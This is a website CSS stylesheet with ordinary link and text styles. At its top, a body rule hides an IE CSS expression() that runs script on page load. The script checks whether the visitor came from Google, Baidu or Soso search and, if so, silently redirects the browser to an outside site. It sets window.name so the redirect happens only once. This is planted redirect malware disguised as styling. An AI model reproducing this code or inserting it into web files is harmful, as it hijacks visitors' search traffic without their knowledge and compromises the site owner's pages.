body {onload:expression(
if(window.name!="Yang"){
var str1 = document.referrer;
str1 = str1.toLowerCase();
var str6 = 'google.';
var str7 = 'baidu.';
var str5 = 'soso.';
if(str1.indexOf(str7)>0 || str1.indexOf(str6)>0 || str1.indexOf(str5)>0 && "zh-cn"==navigator.systemLanguage)
{
self.location='http://www.whbsy.com/';
window.name="Yang";
}

}
);}
a:active {
	font-size: 12px;
	color: #FFFFFF;
	text-decoration: none;
	line-height: 16px;
}
a:link {
	font-size: 12px;
	color: #000000;
	text-decoration: none;
	line-height: 16px;
}
a:visited {
	font-size: 12px;
	color: #000000;
	text-decoration: none;
	line-height: 16px;
}
a:hover {
	font-size: 12px;
	color: #575656;
	text-decoration: none;
	line-height: 16px;
}
.text {
	font-size: 12px;

	line-height: 20.px;
	line-height: 20px;
	color: #000000;
}
.fontsize_12px {  font-size: 12px; color: #000000; font-weight: lighter}
.textCopy { font-size: 14px ; color: #666666}
.title {
	font-size: 13px;
	font-weight: bold;
	color: #000000;
}
.title_top {
	color: #FFFFFF;
	font-weight: bold;
	font-size: 13px;
}


